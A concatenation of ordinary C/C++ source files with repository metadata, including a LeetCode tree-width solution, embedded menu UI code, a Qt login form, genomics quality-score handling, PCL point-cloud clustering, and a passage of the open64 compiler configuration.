private: void SetBuffers(); //设置VAO和VBO void DataInit(string objPath, string objDataPath, ObjIndexType type, bool isTexture, string lightPath); //实时部分用来初始化模型并根据预处理的数据计算每个顶点的颜色 //void SetTexture(); //生成纹理并绑定数据 };
b3255c3e596299277bfd1d0b2b1f33936d12b5a3
d15dfc660dc216473df86d421358e5be109d099c
/day9.cpp
a35508efa30934c8c2eccb68f66e1857799e92bf
[]
no_license
supgunjan/July_LeetCoding_Challenge
03f8de82ee5cec9d6e92a120f9c62c5b9a448650
019f3868278e4f3e5eeb2938b332e0ce88fa33af
refs/heads/master
2022-11-26T14:39:16.398182
2020-08-02T05:22:32
2020-08-02T05:22:32
279,968,725
0
0
null
null
null
null
UTF-8
C++
false
false
1,144
cpp
day9.cpp
/** * Definition for a binary tree node. * struct TreeNode { * int val; * TreeNode *left; * TreeNode *right; * TreeNode() : val(0), left(nullptr), right(nullptr) {} * TreeNode(int x) : val(x), left(nullptr), right(nullptr) {} * TreeNode(int x, TreeNode *left, TreeNode *right) : val(x), left(left), right(right) {} * }; */ #define ull unsigned long long class Solution { public: ull widthOfBinaryTree(TreeNode* root) { if(root == NULL) return 0; queue<pair<TreeNode*,ull>> q; q.push(make_pair(root,1)); ull mx = 0; while(!q.empty()) { ull sz = q.size(); ull diff = (q.back().second - q.front().second); mx = max(diff,mx); while(sz--) { pair<TreeNode*,ull> p = q.front(); q.pop(); if(p.first->left) q.push(make_pair(p.first->left,(p.second*2)+1)); if(p.first->right) q.push(make_pair(p.first->right,(p.second*2)+2)); } } return mx+1; } };
3e0bc3162d307c1476b2b1059bb090b95f2bb5ee
febe42791462ef7605ab65a68d39bfc6b385c952
/Firmware/MenuView.cpp
0faf25feae5e109366f4633be06d5e788deb4807
[ "MIT" ]
permissive
appfruits/LittleHelper
ae34fc7bb7b0ad928eed84c7eab91b72ba3f900b
3d190620973328b8edab6ddd6df0b3e2da348dbb
refs/heads/master
2021-05-04T10:52:34.726912
2017-02-24T14:56:07
2017-02-24T14:56:07
47,962,267
29
1
null
null
null
null
UTF-8
C++
false
false
5,685
cpp
MenuView.cpp
/* * Little Helper -- your best friend in your lab * http://www.appfruits.com/littlehelper * * This software is part of the firmware running Little Helper. You may use, copy, * modify, merge, publish, distribute, sublicense, and/or sell copies of the Software * but you must include this copyright notice and this permission in all copies or * substantial portions of the Software. * * Appfruits invests time and resources to make this open source. Please support us * and the open-source hardware initiative. * * Copyright 2014-2015 Phillip Schuster (@appfruits) * http://www.appfruits.com * * MIT-License */ #include "MenuView.h" #include "Animator.h" #include "MenuItemView.h" #include "Application.h" MenuView::MenuView() { _scrollOffset = 0; _selectedItemIndex = 0; _delegate = NULL; } MenuView::MenuView(String name, uint16_t x, uint16_t y, uint16_t width, uint16_t height, bool vertical) : View(x,y,width,height) { _selectedItemIndex = 0; setName(name); _touchWheelOffset = 0.0f; _delegate = NULL; _vertical = vertical; _scrollOffset = 0; } MenuView::~MenuView() { while (!_menuItems.isEmpty()) { MenuItemView* itemView = _menuItems.pop(); delete itemView; } } void MenuView::draw() { display.setClipRect(getFrame()); display.fillRect(_frame.x,_frame.y,_frame.width,_frame.height, ST7735_BLACK); for (uint16_t i=0;i<_menuItems.count();i++) { MenuItemView* itemView = _menuItems.at(i); itemView->setSelected((_selectedItemIndex == i)); itemView->draw(); } display.resetClipRect(); } Rect MenuView::itemViewRect(int itemIndex) { return Rect(_frame.x,_frame.y + (28*itemIndex),128,26); } void MenuView::layout() { View::layout(); if (_vertical) { Rect frame = Rect(_frame.x,_frame.y-_scrollOffset,128,26); for (uint16_t i=0;i<_menuItems.count();i++) { MenuItemView* itemView = _menuItems.at(i); if (itemView) { itemView->setFrame(frame); frame.y += 28; } } } else { int gap = 1; int itemWidth = (_frame.width - ((_menuItems.count()-1) * gap)) / _menuItems.count(); Rect frame = Rect(_frame.x,_frame.y,itemWidth,_frame.height); for (uint16_t i=0;i<_menuItems.count();i++) { MenuItemView* itemView = _menuItems.at(i); if (itemView) { itemView->setFrame(frame); frame.x += itemWidth + gap; } } } } void MenuView::addMenuItem(MenuItemView *view) { _menuItems.push(view); view->setMenuView(this); layout(); } uint8_t MenuView::getSelectedItemIndex() { return _selectedItemIndex; } void MenuView::setScrollOffset(int32_t offset, bool animated) { LOG_VALUE("Scroll-Offset",offset); Animation* animation = Animator.getAnimationSlot(); if (!animation || !animated) { _scrollOffset = offset; layout(); return; } animation->init("scrollOffset",_scrollOffset,offset,0.1); addAnimation(animation); layout(); } void MenuView::setSelectedItemIndex(uint8_t selectedItemIndex) { if (_selectedItemIndex == selectedItemIndex) return; _selectedItemIndex = selectedItemIndex; LOG_VALUE("Setting selected index",selectedItemIndex); //Check scrollOffset MenuItemView* itemView = _menuItems.at(_selectedItemIndex); if (itemView) { Rect itemRect = itemViewRect(_selectedItemIndex); if (itemView->getFrame().bottom() > _frame.bottom()) { setScrollOffset(itemRect.bottom() - _frame.bottom(), true); } else if (itemView->getFrame().top() < _frame.top()) { setScrollOffset(itemRect.top()-_frame.top(),true); } } setNeedsDisplay(); } void MenuView::popLeft(bool animated) { Animation* animation = Animator.getAnimationSlot(); if (!animation || !animated) { _frame.x = -MAXX; layout(); return; } animation->init("frame.x",_frame.x,-MAXX,0.3); addAnimation(animation); } void MenuView::pushLeft(bool animated) { //_frame.x = MAXX-30; Animation* animation = Animator.getAnimationSlot(); if (!animation || !animated) { _frame.x = MINX; layout(); return; } animation->init("frame.x",_frame.x,MINX,0.3,0.2); addAnimation(animation); } void MenuView::popRight(bool animated) { Animation* animation = Animator.getAnimationSlot(); if (!animation || !animated) { _frame.x = MAXX; layout(); return; } animation->init("frame.x",_frame.x,MAXX,0.3); addAnimation(animation); } void MenuView::pushRight(bool animated) { _frame.x = -MAXX; Animation* animation = Animator.getAnimationSlot(); if (!animation || !animated) { _frame.x = MINX; layout(); return; } animation->init("frame.x",_frame.x,MINX,0.3,0.2); addAnimation(animation); } void MenuView::animationUpdated(Animation *animation, float currentValue, float timeLeft) { View::animationUpdated(animation, currentValue, timeLeft); if (animation->getKey() == "scrollOffset") { _scrollOffset = currentValue; layout(); } } void MenuView::setName(String name) { _name = name; } String MenuView::getName() { return _name; } int MenuView::getNumberOfItems() { return _menuItems.count(); } void MenuView::handleEvents() { View::handleEvents(); if (touchWheel.isSliding()) { _touchWheelOffset += ((float)touchWheel.getSliderDelta() * 0.05f); if (_touchWheelOffset < 0) _touchWheelOffset = 0; if (_touchWheelOffset > _menuItems.count()-1) _touchWheelOffset = _menuItems.count()-1; setSelectedItemIndex(_touchWheelOffset); } if (button.buttonClicked()) { MenuItemView* selectedItemView = _menuItems.at(_selectedItemIndex); if (selectedItemView) { selectedItemView->onClicked(); } } } MenuViewDelegate* MenuView::getDelegate() { return _delegate; } void MenuView::setDelegate(MenuViewDelegate *delegate) { _delegate = delegate; } String MenuView::getDescription() { return "MenuView"; }
ab3f69fd67c35602bee4f5c980bb8f741e3d64bc
0c7e3f38b7b3205a5654296c46fe03b0156ad000
/build-SistemaFerreteria2020-Desktop_Qt_5_13_2_MinGW_64_bit-Profile/ui_login.h
8a4a24674aea0a14d73491d2a2f954ca02bd39c5
[]
no_license
FrapoDeveloper/SistemaFerreteria
fb55001523e68ce6ece080720e5cf9d63dce1cc8
5f1bf99cced03d083c0c8df774d6b43e667a5eb5
refs/heads/master
2022-11-15T20:52:18.329555
2020-07-08T17:31:20
2020-07-08T17:31:20
277,004,018
1
0
null
null
null
null
UTF-8
C++
false
false
4,116
h
ui_login.h
/******************************************************************************** ** Form generated from reading UI file 'login.ui' ** ** Created by: Qt User Interface Compiler version 5.13.2 ** ** WARNING! All changes made in this file will be lost when recompiling UI file! ********************************************************************************/ #ifndef UI_LOGIN_H #define UI_LOGIN_H #include <QtCore/QVariant> #include <QtWidgets/QApplication> #include <QtWidgets/QLabel> #include <QtWidgets/QLineEdit> #include <QtWidgets/QMainWindow> #include <QtWidgets/QMenuBar> #include <QtWidgets/QPushButton> #include <QtWidgets/QStatusBar> #include <QtWidgets/QWidget> QT_BEGIN_NAMESPACE class Ui_Login { public: QWidget *centralwidget; QLabel *ventana_login; QLineEdit *pass_user; QLineEdit *name_user; QPushButton *id_ingresar; QLabel *mensaje_error; QMenuBar *menubar; QStatusBar *statusbar; void setupUi(QMainWindow *Login) { if (Login->objectName().isEmpty()) Login->setObjectName(QString::fromUtf8("Login")); Login->resize(1024, 759); centralwidget = new QWidget(Login); centralwidget->setObjectName(QString::fromUtf8("centralwidget")); ventana_login = new QLabel(centralwidget); ventana_login->setObjectName(QString::fromUtf8("ventana_login")); ventana_login->setGeometry(QRect(0, 0, 1051, 721)); ventana_login->setPixmap(QPixmap(QString::fromUtf8(":/login-design.jpg"))); pass_user = new QLineEdit(centralwidget); pass_user->setObjectName(QString::fromUtf8("pass_user")); pass_user->setGeometry(QRect(330, 440, 361, 31)); QFont font; font.setFamily(QString::fromUtf8("Arial")); font.setPointSize(14); font.setBold(true); font.setWeight(75); pass_user->setFont(font); pass_user->setEchoMode(QLineEdit::Password); name_user = new QLineEdit(centralwidget); name_user->setObjectName(QString::fromUtf8("name_user")); name_user->setGeometry(QRect(330, 310, 361, 31)); QFont font1; font1.setFamily(QString::fromUtf8("Arial")); font1.setPointSize(14); font1.setBold(false); font1.setWeight(50); name_user->setFont(font1); id_ingresar = new QPushButton(centralwidget); id_ingresar->setObjectName(QString::fromUtf8("id_ingresar")); id_ingresar->setGeometry(QRect(460, 550, 131, 31)); QFont font2; font2.setFamily(QString::fromUtf8("Arial")); font2.setPointSize(12); font2.setBold(true); font2.setItalic(false); font2.setWeight(75); id_ingresar->setFont(font2); mensaje_error = new QLabel(centralwidget); mensaje_error->setObjectName(QString::fromUtf8("mensaje_error")); mensaje_error->setGeometry(QRect(410, 610, 241, 21)); QFont font3; font3.setFamily(QString::fromUtf8("Arial")); font3.setPointSize(12); font3.setBold(true); font3.setWeight(75); mensaje_error->setFont(font3); Login->setCentralWidget(centralwidget); menubar = new QMenuBar(Login); menubar->setObjectName(QString::fromUtf8("menubar")); menubar->setGeometry(QRect(0, 0, 1024, 25)); Login->setMenuBar(menubar); statusbar = new QStatusBar(Login); statusbar->setObjectName(QString::fromUtf8("statusbar")); Login->setStatusBar(statusbar); retranslateUi(Login); QMetaObject::connectSlotsByName(Login); } // setupUi void retranslateUi(QMainWindow *Login) { Login->setWindowTitle(QCoreApplication::translate("Login", "Login", nullptr)); ventana_login->setText(QString()); id_ingresar->setText(QCoreApplication::translate("Login", "Iniciar", nullptr)); mensaje_error->setText(QCoreApplication::translate("Login", "Usuario o contase\303\261a incorrecta", nullptr)); } // retranslateUi }; namespace Ui { class Login: public Ui_Login {}; } // namespace Ui QT_END_NAMESPACE #endif // UI_LOGIN_H
493033a33c3b22905196b67065e0dfc01030eef8
dd7eaac25a99f76c3ba2004e339840c08aa304a2
/gui/core_output_widget.h
cf8d74af136ec213fd1449512de94cd8372e2a49
[]
no_license
Sangwon91/IASTpp
7fbd4c40e4486f59d63aa37fd6dfd43091dc4c4b
250bd28c6f3abf11cb93de566710b0e7cf95bdc1
refs/heads/master
2023-05-10T16:46:13.764801
2023-04-28T23:56:19
2023-04-28T23:56:19
87,755,873
6
1
null
null
null
null
UTF-8
C++
false
false
921
h
core_output_widget.h
#ifndef COREOUTPUTWIDGET_H #define COREOUTPUTWIDGET_H #include <QWidget> #include <QPushButton> #include <QTableWidget> #include "iast_plotter/iast_plotter_widget.h" class CoreOutputWidget : public QWidget { Q_OBJECT public: explicit CoreOutputWidget(QWidget *parent = 0); QTableWidget* table(); void getIsothermTable(QTableWidget* isothermTable); void getInputTable(QTableWidget* inputTable); protected: virtual void keyPressEvent(QKeyEvent* event) override; signals: public slots: void cleanUpTable(); void exportTable(); void openPlotter(); private: QTableWidget* mTable; QPushButton* mExportButton; QPushButton* mPlotButton; QPushButton* mCleanButton; // For exporting functionality QTableWidget* mInputTable; QTableWidget* mIsothermTable; IastPlotterWidget* mPlotter; void setup(); void copy(); }; #endif // COREOUTPUTWIDGET_H
8384e471c4aa83749823968eac8593ce8da09494
ad67c89e1de7818641a52788ef04ce7865039b07
/gamgee/base_quals.cpp
00786096ebd593688321b34b38edf86a5689d884
[ "MIT" ]
permissive
droazen/gamgee
2ad1b40094ac6fa873117ad9a0406396f234f90d
d7078cd2ac047e133521cb07be3d7621baf96062
refs/heads/master
2021-01-15T12:59:07.996715
2014-05-22T17:48:46
2014-05-22T17:48:46
null
0
0
null
null
null
null
UTF-8
C++
false
false
2,610
cpp
base_quals.cpp
#include "base_quals.h" #include "utils/hts_memory.h" #include <string> #include <stdexcept> using namespace std; namespace gamgee { /** * @brief creates a BaseQuals object that points to htslib memory already allocated * * @note the resulting BaseQuals object shares ownership of the pre-allocated memory via * shared_ptr reference counting */ BaseQuals::BaseQuals(const std::shared_ptr<bam1_t>& sam_record) : m_sam_record { sam_record }, m_quals { bam_get_qual(sam_record.get()) }, m_num_quals { uint32_t((sam_record.get())->core.l_qseq) } {} /** * @brief creates a deep copy of a BaseQuals object * * @note the copy will have exclusive ownership over the newly-allocated htslib memory */ BaseQuals::BaseQuals(const BaseQuals& other) : m_sam_record { utils::make_shared_sam(utils::sam_deep_copy(other.m_sam_record.get())) }, m_quals { bam_get_qual(m_sam_record.get()) }, m_num_quals { other.m_num_quals } {} /** * @brief moves a BaseQuals object, transferring ownership of the underlying htslib memory */ BaseQuals::BaseQuals(BaseQuals&& other) noexcept : m_sam_record { move(other.m_sam_record) }, m_quals { other.m_quals }, m_num_quals { other.m_num_quals } { other.m_quals = nullptr; } /** * @brief creates a deep copy of a BaseQuals object * * @note the copy will have exclusive ownership over the newly-allocated htslib memory */ BaseQuals& BaseQuals::operator=(const BaseQuals& other) { if ( &other == this ) return *this; m_sam_record = utils::make_shared_sam(utils::sam_deep_copy(other.m_sam_record.get())); ///< shared_ptr assignment will take care of deallocating old sam record if necessary m_quals = bam_get_qual(m_sam_record.get()); m_num_quals = other.m_num_quals; return *this; } /** * @brief moves a BaseQuals object, transferring ownership of the underlying htslib memory */ BaseQuals& BaseQuals::operator=(BaseQuals&& other) noexcept { if ( &other == this ) return *this; m_sam_record = move(other.m_sam_record); ///< shared_ptr assignment will take care of deallocating old sam record if necessary m_quals = other.m_quals; other.m_quals = nullptr; m_num_quals = other.m_num_quals; return *this; } /** * @brief access an individual base quality by index * * @return base quality at the specified index as an unsigned byte */ uint8_t BaseQuals::operator[](const uint32_t index) const { if ( index >= m_num_quals ) throw out_of_range(string("Index ") + to_string(index) + " out of range in BaseQuals::operator[]"); return m_quals[index]; } } // end of namespace gamgee
8f910aa390c41dcfba23b1b09285a465e2579023
ec5508b479a14b239fcc466cc880637188a1b70f
/chapter4/seg_cluster.cpp
64657ebf32bb39875de8a606572f266f27620d2a
[]
no_license
zhenyu/aiimooc
abb50749d467277e8af3dda999b9677a53e719e8
23ce0bfbc2d7a86162b05ee8c1073d33ee23102e
refs/heads/main
2023-04-06T03:29:40.321078
2021-03-16T05:20:11
2021-03-16T05:20:11
324,608,910
2
0
null
null
null
null
UTF-8
C++
false
false
8,091
cpp
seg_cluster.cpp
/* PCL中实现欧式聚类提取。 对三维点云组成的场景进行分割 桌子平面上 的点云团 使用 欧式聚类的算法 kd树搜索 对点云聚类分割 1. 半径滤波(统计学滤波)删除离群点 体素格下采样等 2. 采样一致找到桌面(平面)或者除去滤波    3. 提取除去平面内点的 外点 (桌上的物体就自然成了一个个的浮空点云团) 4. 欧式聚类 提取出我们想要识别的东西 */ #include <thread> #include <pcl/ModelCoefficients.h> //模型系数 #include <pcl/point_types.h> //点云基本类型 #include <pcl/io/pcd_io.h> //io #include <pcl/filters/extract_indices.h> //根据索引提取点云 #include <pcl/filters/voxel_grid.h> //体素格下采样 #include <pcl/features/normal_3d.h> //点云法线特征 #include <pcl/kdtree/kdtree.h> //kd树搜索算法 #include <pcl/sample_consensus/method_types.h> //采样方法 #include <pcl/sample_consensus/model_types.h> //采样模型 #include <pcl/segmentation/sac_segmentation.h> //随机采用分割 #include <pcl/segmentation/extract_clusters.h> //欧式聚类分割 #include <pcl/visualization/pcl_visualizer.h> // 可视化 /****************************************************************************** 打开点云数据,并对点云进行滤波重采样预处理,然后采用平面分割模型对点云进行分割处理 提取出点云中所有在平面上的点集,并将其存盘 ******************************************************************************/ int main(int argc, char **argv) { // 读取桌面场景点云 pcl::PCDReader reader; pcl::PointCloud<pcl::PointXYZ>::Ptr cloud(new pcl::PointCloud<pcl::PointXYZ>), cloud_f(new pcl::PointCloud<pcl::PointXYZ>); reader.read("../homework.pcd", *cloud); std::cout << "PointCloud before filtering has: " << cloud->points.size() << " data points." << std::endl; //* // 之前可进行 统计学滤波去除外点 // //体素格滤波下采样 1cm×1cm×1cm pcl::VoxelGrid<pcl::PointXYZ> vg; //体素格滤波下采样 pcl::PointCloud<pcl::PointXYZ>::Ptr cloud_filtered(new pcl::PointCloud<pcl::PointXYZ>); vg.setInputCloud(cloud); vg.setLeafSize(0.01f, 0.01f, 0.01f); vg.filter(*cloud_filtered); std::cout << "PointCloud after filtering has: " << cloud_filtered->points.size() << " data points." << std::endl; //* //创建平面模型分割的对象并设置参数 pcl::SACSegmentation<pcl::PointXYZ> seg; pcl::PointIndices::Ptr inliers(new pcl::PointIndices); pcl::ModelCoefficients::Ptr coefficients(new pcl::ModelCoefficients); //系数 pcl::PointCloud<pcl::PointXYZ>::Ptr cloud_plane(new pcl::PointCloud<pcl::PointXYZ>()); pcl::PCDWriter writer; seg.setOptimizeCoefficients(true); seg.setModelType(pcl::SACMODEL_PLANE); //分割模型 平面模型 seg.setMethodType(pcl::SAC_RANSAC); //随机采样一致性 参数估计方法 seg.setMaxIterations(200); //最大的迭代的次数 seg.setDistanceThreshold(0.02); //设置符合模型的内点 阀值 int i = 0, nr_points = (int)cloud_filtered->points.size(); //下采样前点云数量 while (cloud_filtered->points.size() > 0.3 * nr_points) // 模型分割 直到 剩余点云数量在30%以上 确保模型点云较好 { // Segment the largest planar component from the remaining cloud seg.setInputCloud(cloud_filtered); seg.segment(*inliers, *coefficients); //分割 if (inliers->indices.size() == 0) { std::cout << "Could not estimate a planar model for the given dataset." << std::endl; break; } pcl::ExtractIndices<pcl::PointXYZ> extract; //按索引提取点云 extract.setInputCloud(cloud_filtered); extract.setIndices(inliers); //提取符合平面模型的内点 extract.setNegative(false); // 平面模型内点 extract.filter(*cloud_plane); std::cout << "PointCloud representing the planar component: " << cloud_plane->points.size() << " data points." << std::endl; std::stringstream ss; ss << "seg_" << i << ".pcd"; writer.write<pcl::PointXYZ> (ss.str (), *cloud_plane, false); //* i++; // 移去平面局内点,提取剩余点云 extract.setNegative(true); extract.filter(*cloud_f); *cloud_filtered = *cloud_f; //剩余点云 } // 桌子平面上 的点云团 使用 欧式聚类的算法 kd树搜索 对点云聚类分割 pcl::search::KdTree<pcl::PointXYZ>::Ptr tree(new pcl::search::KdTree<pcl::PointXYZ>); tree->setInputCloud(cloud_filtered); // 桌子平面上其他的点云 std::vector<pcl::PointIndices> cluster_indices; // 点云团索引 pcl::EuclideanClusterExtraction<pcl::PointXYZ> ec; // 欧式聚类对象 ec.setClusterTolerance(0.02); // 设置近邻搜索的搜索半径为2cm ec.setMinClusterSize(100); // 设置一个聚类需要的最少的点数目为100 ec.setMaxClusterSize(25000); // 设置一个聚类需要的最大点数目为25000 ec.setSearchMethod(tree); // 设置点云的搜索机制 ec.setInputCloud(cloud_filtered); ec.extract(cluster_indices); //从点云中提取聚类,并将点云索引保存在cluster_indices中 pcl::PointCloud<pcl::PointXYZ>::Ptr cloud_cluster_all(new pcl::PointCloud<pcl::PointXYZ>); //迭代访问点云索引cluster_indices,直到分割处所有聚类 int j = 0; for (std::vector<pcl::PointIndices>::const_iterator it = cluster_indices.begin(); it != cluster_indices.end(); ++it) { pcl::PointCloud<pcl::PointXYZ>::Ptr cloud_cluster(new pcl::PointCloud<pcl::PointXYZ>); for (std::vector<int>::const_iterator pit = it->indices.begin(); pit != it->indices.end(); ++pit) cloud_cluster->points.push_back(cloud_filtered->points[*pit]); //获取每一个点云团 的 点 cloud_cluster->width = cloud_cluster->points.size(); cloud_cluster->height = 1; cloud_cluster->is_dense = true; std::cout << "PointCloud representing the Cluster: " << cloud_cluster->points.size() << " data points." << std::endl; std::stringstream ss; ss << "cluster_" << j << ".pcd"; writer.write<pcl::PointXYZ> (ss.str (), *cloud_cluster, false); //* j++; *cloud_cluster_all += *cloud_cluster; } // 3D点云显示 绿色 pcl::visualization::PCLVisualizer viewer("3D Viewer"); viewer.setBackgroundColor(255, 255, 255); //背景颜色 白色 //viewer.addCoordinateSystem (1.0); viewer.initCameraParameters(); //平面上的点云 红色 pcl::visualization::PointCloudColorHandlerCustom<pcl::PointXYZ> cloud_plane_handler(cloud_plane, 255, 0, 0); viewer.addPointCloud(cloud_plane, cloud_plane_handler, "plan point"); //添加点云 viewer.setPointCloudRenderingProperties(pcl::visualization::PCL_VISUALIZER_POINT_SIZE, 2, "plan point"); // 桌上的物体就自然成了一个个的浮空点云团 绿色 pcl::visualization::PointCloudColorHandlerCustom<pcl::PointXYZ> cloud_cluster_handler(cloud_cluster_all, 0, 255, 0); viewer.addPointCloud(cloud_cluster_all, cloud_cluster_handler, "cloud_cluster point"); //添加点云 viewer.setPointCloudRenderingProperties(pcl::visualization::PCL_VISUALIZER_POINT_SIZE, 3, "cloud_cluster point"); while (!viewer.wasStopped()) { viewer.spinOnce(100); using namespace std::chrono_literals; std::this_thread::sleep_for(100ms); } return (0); }
12efd78bf40064d70b19827c7921ea9ed9084c87
de4a42eba918bf1186c198163fb525aa899776d6
/09_DecimaltoOctal.cc
2fb99c1f246cf83e8073ed9b5b580f4d54f3dabd
[]
no_license
KaushikJais/Cplusplus
9a1f553a573e495d8e200ad32bf24d7ef305f4eb
8e7300c7846a1c29630a54d0556d134d2012f735
refs/heads/master
2020-04-01T08:58:03.042419
2018-10-15T04:51:07
2018-10-15T04:51:07
153,054,166
0
0
null
null
null
null
UTF-8
C++
false
false
248
cc
09_DecimaltoOctal.cc
#include <iostream> #include <cmath> using namespace std; int main(){ int dec; cin>>dec; int rem=0; int base=10; int i=0; int oct=0; while(dec!=0){ rem=dec%8; dec = dec/8; oct = rem*pow(10,i)+oct; ++i; } cout<<oct; return 0; }
18267b2057f36f3c2583b0d124d5bffa1efd6006
3cf4968c9d388fe2a30d5772c5065afe8dede302
/libs/sopas/include/ColaBProtocol.h
2aec518ce82a50467c58e107c68e2e5f879bc9a7
[]
no_license
tobiasebsen/ofxSick
19242e558b129411f4d0737abbf8d7d0f0400ef3
e9ce840bf9df2f0ca2968b92ef94bf94aee0ee6c
refs/heads/master
2021-01-10T02:43:07.309382
2015-09-25T13:20:21
2015-09-25T13:20:21
39,657,659
0
1
null
null
null
null
UTF-8
C++
false
false
2,612
h
ColaBProtocol.h
#ifndef __COLA_B_PROTOCOL_H__ #define __COLA_B_PROTOCOL_H__ /* ========================================================================================== Copyright (c) SICK AG - Division Auto Ident, 2008 ========================================================================================== */ #include "Protocol.h" #include "SopasBasicTypes.h" #include <string> #include "BinarySerializer.h" #include "BinaryDeserializer.h" /*======================================================================================*/ /*! \brief Implements the COLA-B-protocol \ingroup common This class implements the COLA-B-protocol. It must be used in conjunction with binary framing (CSopasBinaryFramer), ASCII-framing won't work correctly. This class implements some specifics for the binary protocol, e.g. it uses the CBinarySerializer and CBinaryDeserializer. For more information see \link CProtocol base class documentation\endlink. The COLA-B protocol allows an optional \e space to be sent after the command (e.g. sRN<em>\<space\></em>DeviceIdent). This is not done in this implementation. */ /*======================================================================================*/ class CColaBProtocol : public CProtocol { public: CColaBProtocol(CCommunication& rCommunication, CFramer& rFramer); //!< Constructor defines according communication channel and framer to use. virtual ~CColaBProtocol(void); //!< Destructor deletes communication channel and framer. virtual CSerializer& GetSerializer(void); //!< Gets data serializer used by this protocol. virtual CDeserializer& GetDeserializer(void); //!< Gets data deserializer used by this protocol. protected: virtual bool DeserializeCommName(CBinaryDataStream& rInputStream, std::string& rCommName); //!< Deserializes the communication name within answer. virtual size_t GetSerializedCommNameSize(const SOPAS_FixString& rCommName); //!< Gets the length of the communication name to be serialized to the request. virtual bool SerializeCommName(CBinaryDataStream& rOutputStream, const SOPAS_FixString& rCommName); //!< Serializes communication name for "by name" request. private: CColaBProtocol(const CColaBProtocol&); //!< Do not allow copying CColaBProtocol& operator=(const CColaBProtocol&); //!< Do not allow copying CBinarySerializer m_Serializer; //!< Serializer used by this protocol. CBinaryDeserializer m_Deserializer; //!< Deserializer used by this protocol. }; #endif
e0d0219a981bfedbf6185d091aef1b8355733afb
d313a67d684103b0ee7058c63a304c1b975abc0f
/open64/osprey1.0/common/com/config.cxx
be3723a9c52427f6c8d491a3c5c8bbfbb826ae6f
[ "BSD-2-Clause" ]
permissive
xusx595/upc
0bbef930d0f76926f049a034ba8d8e851559d0d1
e17f40219d8594ab6bd281b2ff36d542798deac5
refs/heads/master
2021-01-17T05:28:28.941066
2015-03-22T21:39:40
2015-03-22T21:39:40
32,696,839
0
0
null
null
null
null
UTF-8
C++
false
false
64,578
cxx
config.cxx
/* Copyright (C) 2000, 2001 Silicon Graphics, Inc. All Rights Reserved. This program is free software; you can redistribute it and/or modify it under the terms of version 2 of the GNU General Public License as published by the Free Software Foundation. This program is distributed in the hope that it would be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. Further, this software is distributed without any warranty that it is free of the rightful claim of any third person regarding infringement or the like. Any license provided herein, whether implied or otherwise, applies only to this software file. Patent licenses, if any, provided herein do not apply to combinations of this program with other software, or any other product whatsoever. You should have received a copy of the GNU General Public License along with this program; if not, write the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston MA 02111-1307, USA. Contact information: Silicon Graphics, Inc., 1600 Amphitheatre Pky, Mountain View, CA 94043, or: http://www.sgi.com For further information regarding this notice, see: http://oss.sgi.com/projects/GenInfo/NoticeExplan */ /* ==================================================================== * ==================================================================== * * Module: config.c * $Revision: 1.4 $ * $Date: 2012/04/28 01:48:21 $ * $Author: phargrov $ * $Source: bitbucket.org:berkeleylab/upc-translator.git/open64/osprey1.0/common/com/config.cxx $ * * Revision history: * 06-Jun-90 - Original Version (moved from cdriver.c) * 01-Feb-91 - Copied for TP/Muse * 15-Jun-91 - Restructured and integrated Josie * 05-May-96 - Added -WOPT group. * * Description: * * Configuration data and routines to set up configuration. * * Refer to the discussion in config.h for the distribution of such * data and processing among the various configuration files. * * ==================================================================== * ==================================================================== */ #ifdef _KEEP_RCS_ID /*REFERENCED*/ static char *rcs_id = "$Source: bitbucket.org:berkeleylab/upc-translator.git/open64/osprey1.0/common/com/config.cxx $ $Revision: 1.4 $"; #endif /* _KEEP_RCS_ID */ #ifdef FRONT_END /* For setting fullwarn, woff in front end */ #ifndef FRONT_F90 #ifdef EDGSRC # include "basics.h" # include "cmd_line.h" # include "error.h" #endif /* EDGSRC */ #endif /* ~FRONT_F90 */ #endif /* FRONT_END */ #include <ctype.h> /* For isdigit */ #include <elf.h> #define USE_STANDARD_TYPES 1 #include "defs.h" #include "em_elf.h" #include "config.h" #include "config_platform.h" #include "config_targ.h" #include "erglob.h" #include "flags.h" #include "tracing.h" #include "glob.h" #include "symtab.h" #include "wn.h" #ifndef BACK_END static INT32 Ignore_Int; #endif /* The following contains the phase-specific option groups and their * associated variable definitions: */ #include "config_targ_aux.cxx" #include "config_debug.cxx" #include "config_ipa.cxx" #include "config_list.cxx" #include "config_opt.cxx" #include "config_wopt.cxx" #include "config_vho.cxx" #include "config_flist.cxx" #include "config_clist.cxx" #include "config_purple.cxx" #include "config_promp.cxx" #ifdef BACK_END # include "config_lno.cxx" # include "instr_reader.h" #endif /* IR builder sometimes needs to know whether we're in front end: */ #ifdef SINGLE_PROCESS INT16 In_Front_End = TRUE; /* Start out there */ #endif /* ==================================================================== * * Global option flags * * ==================================================================== */ /***** General optimization control *****/ BOOL Enable_LOH = FALSE; /* Do loop overhead processing? */ BOOL Enable_LOH_overridden = FALSE; /* ... option seen? */ BOOL CSE_Elim_Enabled = FALSE; /* Is CSE-elim on? -- this does * not control it, it just * shadows the opt. level */ #ifdef BACK_END # define DEF_DEBUG_LEVEL 0 INT8 Debug_Level = DEF_DEBUG_LEVEL; /* -gn: debug level */ #endif /***** Alignment (misaligned memory reference) control *****/ BOOL UseAlignedCopyForStructs = FALSE; /* control aggregrate copy */ INT32 MinStructCopyLoopSize = 16; /* 0 = always expand */ INT32 MinStructCopyMemIntrSize= 0; /* generate bcopy */ INT32 Aggregate_Alignment = -1; /* This alignment for aggregate layout */ INT32 iolist_reuse_limit = 100; /***** Pointer optimizations, such as treating pointers as arrays *****/ BOOL Ptr_Opt_Allowed = FALSE; /***** Put all-zero initialized file-level data in the BSS section? *****/ BOOL Zeroinit_in_bss = TRUE; /* don't make strings gp-relative (to save gp space) */ BOOL Strings_Not_Gprelative = FALSE; /***** IEEE 754 options *****/ IEEE_LEVEL IEEE_Arithmetic = IEEE_ACCURATE; /* IEEE arithmetic? */ BOOL IEEE_Arith_Set = FALSE; /* ... option seen? */ /* BOOL Force_IEEE_Comparisons = FALSE; */ /* IEEE NaN comparisons? */ /* Moved to ISA/config_targ.cxx */ /***** Speculation eagerness options *****/ EAGER_LEVEL Eager_Level = EAGER_SAFE; /* Eagerness to use: -Xn */ static BOOL Eager_Level_Set = FALSE; /* ... option seen? */ /***** Constant folding and WHIRL simplifier options *****/ ROUNDOFF Roundoff_Level = ROUNDOFF_NONE;/* -OPT_roundoff=n value */ BOOL Roundoff_Set = FALSE; /* ... option seen? */ BOOL Fast_Complex_Allowed = FALSE; /* Fast c_div and c_abs? */ BOOL 